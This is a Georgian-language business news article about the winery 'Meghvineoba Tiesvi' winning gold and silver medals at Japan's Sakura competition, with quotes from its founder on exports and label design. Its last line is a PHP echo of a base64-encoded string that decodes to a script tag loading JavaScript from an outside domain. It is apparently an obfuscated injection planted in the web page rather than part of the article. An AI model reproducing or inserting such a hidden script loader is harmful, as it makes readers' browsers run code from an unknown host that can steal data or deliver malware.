celsiusi
ავერსი საქკაბელი
კომპანია „მეღვინეობა თიესვი“-ს ორი სახეობის ღვინომ იაპონიაში, „საკურას“ კონკურსზე უმაღლესი ჯილდოები მიიღო. საფერავს - ოქროს მედალი, მეფის რჩეულს, კი ვერცხლის მედალი გადაეცა. ამის შესახებ საინფორმაციო სააგენტო BUSINESS TIME-ს „მეღვინეობა თიესვი“–ის დამფუძნებელმა თიკა სვანიძე–ვენკომ  განუცხადა. 
 
მისივე თქმით, ღვინის დეგუსტაცია ორ ლოკაციაზე გაიმართა, თითოეული მათგანი,  ტოკიოში 287-მა, ხოლო კიოტოში 187-მა სომელიემ შეაფასა.
 
კომპანიის დამფუძნებელმა აღნიშნა, რომ საერთაშორისო კონკურსი „საკურა“ მასშტაბური ღონისძიებაა, რომელიც წელს მეცხრედ ჩატარდა. მასში 40 ქვეყნის ოთხი ათასზე მეტი დასახელების ღვინო იყო წარმოდგენილი. კონკურსის ჟიური იაპონიაში, ღვინის სფეროში მოღვაწე ქალბატონებით, სომელიეებით, ღვინის მწერლებითა და ჟურნალისტებითაა დაკომპლექტებული. 
 
"ისეთ პრესტიჟულ კონკურსზე უმაღლესი ჯილდოს მოპოვება, როგორიც "საკურაა" ჩვენთვის დიდი პატივი და სტიმულია, ეს არა მხოლოდ ჩვენი კომპანიის, არამედ საქართველოს წარმატებაა, ასეთი დონის საერთაშორისო კონკურსში გამარჯვება ხელს შეუწყობს, როგორც კონკრეტული კომპანიის, ასევე ზოგადად ქართული ღვინის ცნობადობის გაზრდას, პოპულარიზაციასა და დამკვიდრებას იაპონიის მნიშვნელოვან საექსპორტო ბაზარზე. ჩვენ ახალი კომპანია ვართ ბაზარზე და მართალი გითხრათ არც ველოდით ასეთი დიდი მნიშვნელობის დაჯილდოებაზე მიწვევას, ამიტომ ეს იყო ძალიან ამაღელვებელი და სასიხარულო.
 
ამასთან, აღსანიშნავია, რომ ჩვენი ოქროს მფლობელი საფერავი შესულია შვეიცარიაში მიშელინის ვარსკვლავიან რესტორანში და ესეც ვთვლით, რომ დიდი მიღწევა და წარმატებაა ქართული ღვინის. ასევე, უახლოეს მომავალში ჰოლანდიაშიც შედის მეფის რჩეული და საფერავი. ჩვენ შევეცდებით და ვზრუნავთ, რომ ქართული ღვინო შევიდეს მიშელინის ვარსკვლავის მფლობელ რესტორნებში მსოფლიოს მასტაბით, რაც შეიძლება მეტ ქვეყანაში", - აღნიშნა კომპანია  „მეღვინეობა თიესვი“–ს დამფუძნებელმა თიკა სვანიძე–ვენკომ.
 
მისივე თქმით, კომპანია დიდ მნიშვნელობას ანიჭებს პროდუქციის ხარისხს და მუდმივად აკონტროლებს, რომ მხოლოდ საუკეთესო გავიდეს საერთაშორისო ბაზარზე. 
 
თიკა სვანაძე–ვენკომ ასევე აღნიშნა, რომ საერთაშორისო ეკონომიკური პრობლემების მიუხედავად, პოზიტიურად არის განწყობილი და აღნიშნულს მისი კომპანიისთვის ექსპორტის თვალსაზრისით დამაბრკოლებლად არ აღიქვამს, ვინაიდან, მას აქვს ნიდერლანდებში იმპორტ–ექსპორტის საკუთარი კომპანია, რომელიც საშუალებას აძლევს უპრობლემოდ გაიტანოს საქარველოდან პროდუქცია და მოახდინოს რეალიზაცია. 
 
"გავაკეთე, მაშტაბური, ექსკლუზიური, საერთაშორისო პლატფორმა, ამსტერდამში, რომლის მეშვეობითაც მე შემიძლია, არამხოლოდ ჩვენი კომპანიის  არამედ საქართველოშო მოქმედი სხვა მცირე მეღვინე–მარნების დახმარებაც. შეგვიძლია ჩვენი ღვინო ამერიკის, ევროპის, აზიის და საერთოდ მსოფლიოს მაშტაბით გავზავნოთ და თან  აღსანიშნავია, რომ ძალიან დაბალი ტარიფი გვაქვს გაგზავნის, რაც უფრო ხელსაყრელს ხდის თანამშრომლობას პარტნიორებთან.
 
ამასთან, ჩვენ ვგეგმავთ ამ პლატფორმის მეშვეობით, არამხოლოდ ღვინის, არამედ ჩაის, თაფლის და სხვა ქართული პროდუქციის გატანასაც. აუცილებელი წინაპირობაა ყველაფერი რაც გავა იყოს უმაღლესი ხარისხის და მრავალგზის შემოწმებული.
 
ჩვენ, ასევე, უდიდეს ყურადღებას ვაქცევთ  ეტიკეტს. მე, შემოვიტანე ბრენდინგში ეტიკეტზე ქართული კულტურის პოპულარიზაცია, მაგალითად, ეტიკეტებს გასდევს "ოქროს ფონდში" არსებული, არქეოლოგიურ გათხრებში ნაპოვნი ექსპონატების, სამკაულების და სხვა სიძველეების ამსახველი ფოტოები. ყველა ბოთლი ყვება ისტორიას. როცა იყო დიდგორობა ჩვენ ჩამოვასხით ღვინო – დიდგორი 900, ასევე მეფე ერეკლეზე, ჩვენი ღვინო საქართველოს ისტორიაზე და კულტურაზე ყვება ყველა ბოთლიდან", – აღნიშნა კომპანიის დამფუძნებელმა.  
 
კომპანია  „მეღვინეობა თიესვი“  მადლობას უხდის ენელოგ - ივანე ნარეკლიშვილს უკვე აღიარებული, ოქროს მედალოსანი გემოს შექმნისთვის.
 
 
981
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");